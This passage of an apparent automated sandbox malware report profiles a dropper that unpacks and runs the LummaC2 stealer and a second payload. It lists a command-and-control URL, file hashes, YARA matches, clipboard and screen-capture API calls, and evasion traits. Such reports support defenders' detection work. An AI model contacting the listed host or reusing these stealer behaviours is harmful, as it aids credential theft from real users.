again.</p>

Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1965076870.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964808056.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964972795.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966840568.0000000000D69000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000002.00000003.1964681813.000000000079C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966222190.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000002.00000003.1965076870.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964808056.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964972795.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964681813.000000000079C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966222190.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
Source: Set-up.exe, 00000002.00000003.1965027429.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000002.00000002.1966840568.0000000000D69000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: Set-up.exe, 00000002.00000003.1965076870.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964808056.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964972795.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964681813.000000000079C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966222190.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_00F11B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00F11B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_00F11B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00F11B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_00F11D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_00F11D10

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.E205fJJS1Q.exe.e10000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: E205fJJS1Q.exe	Static PE information: section name:
Source: E205fJJS1Q.exe	Static PE information: section name: .idata
Source: E205fJJS1Q.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F15135	1_2_00F15135
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE8720	1_2_00EE8720
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F070F9	1_2_00F070F9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F030E0	1_2_00F030E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1A0D0	1_2_00F1A0D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F020C0	1_2_00F020C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F180C5	1_2_00F180C5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F168A0	1_2_00F168A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0C894	1_2_00F0C894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF8095	1_2_00EF8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFD840	1_2_00EFD840
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1483C	1_2_00F1483C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF9820	1_2_00EF9820
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF683F	1_2_00EF683F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1B813	1_2_00F1B813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFA800	1_2_00EFA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1A800	1_2_00F1A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1E1F0	1_2_00F1E1F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0C9E9	1_2_00F0C9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0C9DA	1_2_00F0C9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE61D0	1_2_00EE61D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F059B0	1_2_00F059B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0C984	1_2_00F0C984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE3960	1_2_00EE3960
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EEC97C	1_2_00EEC97C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE5970	1_2_00EE5970
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EEB14F	1_2_00EEB14F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1D140	1_2_00F1D140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFAAE0	1_2_00EFAAE0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EEF2A0	1_2_00EEF2A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0C289	1_2_00F0C289
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF1A94	1_2_00EF1A94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE9290	1_2_00EE9290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F07A40	1_2_00F07A40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1D240	1_2_00F1D240
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF4A50	1_2_00EF4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F06230	1_2_00F06230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE8A20	1_2_00EE8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFE230	1_2_00EFE230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF720B	1_2_00EF720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFC205	1_2_00EFC205
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F16BF0	1_2_00F16BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0A3B0	1_2_00F0A3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1D3B0	1_2_00F1D3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1DBB0	1_2_00F1DBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1CBA6	1_2_00F1CBA6
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF7B75	1_2_00EF7B75
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EED35C	1_2_00EED35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EEAB20	1_2_00EEAB20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1D320	1_2_00F1D320
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F11B10	1_2_00F11B10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE4310	1_2_00EE4310
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F174F0	1_2_00F174F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF64E0	1_2_00EF64E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EEE465	1_2_00EEE465
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F03C60	1_2_00F03C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1D450	1_2_00F1D450
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE7440	1_2_00EE7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F08C46	1_2_00F08C46
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE4C50	1_2_00EE4C50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFDC50	1_2_00EFDC50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F07D94	1_2_00F07D94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFD560	1_2_00EFD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F01550	1_2_00F01550
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1E540	1_2_00F1E540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F01D10	1_2_00F01D10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1A510	1_2_00F1A510
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F026D3	1_2_00F026D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F066C0	1_2_00F066C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0FEC0	1_2_00F0FEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1DEB0	1_2_00F1DEB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F17EA0	1_2_00F17EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE6660	1_2_00EE6660
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF5640	1_2_00EF5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F05640	1_2_00F05640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF9605	1_2_00EF9605
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F15FF0	1_2_00F15FF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFDFC0	1_2_00EFDFC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0DFC3	1_2_00F0DFC3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F17790	1_2_00F17790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EF0F71	1_2_00EF0F71
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE2F40	1_2_00EE2F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F0BF45	1_2_00F0BF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EFF700	1_2_00EFF700
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00EE9710	1_2_00EE9710
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007AC9AF	2_3_007AC9AF

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\LummaC2.exe C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Set-up.exe 73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 00EE7FF0 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 00EF4A40 appears 63 times

Source: E205fJJS1Q.exe, 00000000.00000002.1715934056.00000000014E6000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs E205fJJS1Q.exe
Source: E205fJJS1Q.exe, 00000000.00000002.1717680443.0000000005800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs E205fJJS1Q.exe
Source: E205fJJS1Q.exe	Binary or memory string: OriginalFilenameladddad.exe4 vs E205fJJS1Q.exe

Source: E205fJJS1Q.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.E205fJJS1Q.exe.e10000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: E205fJJS1Q.exe

Static PE information: Section: muzridtf ZLIB complexity 0.9950310882026627

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/3@8/2

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_00F0D110 CoCreateInstance,

1_2_00F0D110

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E205fJJS1Q.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: E205fJJS1Q.exe

ReversingLabs: Detection: 55%

Source: E205fJJS1Q.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: E205fJJS1Q.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\E205fJJS1Q.exe "C:\Users\user\Desktop\E205fJJS1Q.exe"
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: E205fJJS1Q.exe

Static file information: File size 6196224 > 1048576

Source: E205fJJS1Q.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x43d600
Source: E205fJJS1Q.exe	Static PE information: Raw size of muzridtf is bigger than: 0x100000 < 0x1a6800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Unpacked PE file: 0.2.E205fJJS1Q.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;muzridtf:EW;yeswpvds:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: E205fJJS1Q.exe	Static PE information: real checksum: 0x5f28d5 should be: 0x5e9d37
Source: LummaC2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4fec3

Source: E205fJJS1Q.exe	Static PE information: section name:
Source: E205fJJS1Q.exe	Static PE information: section name: .idata
Source: E205fJJS1Q.exe	Static PE information: section name:
Source: E205fJJS1Q.exe	Static PE information: section name: muzridtf
Source: E205fJJS1Q.exe	Static PE information: section name: yeswpvds
Source: E205fJJS1Q.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1D0F0 push eax; mov dword ptr [esp], 03020130h	1_2_00F1D0F1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_00F1A480 push eax; mov dword ptr [esp], C9D6D7D4h	1_2_00F1A48E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_0079CFE0 pushad ; iretd	2_3_0079CFE9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B57B9 pushad ; retf	2_3_007B58D9
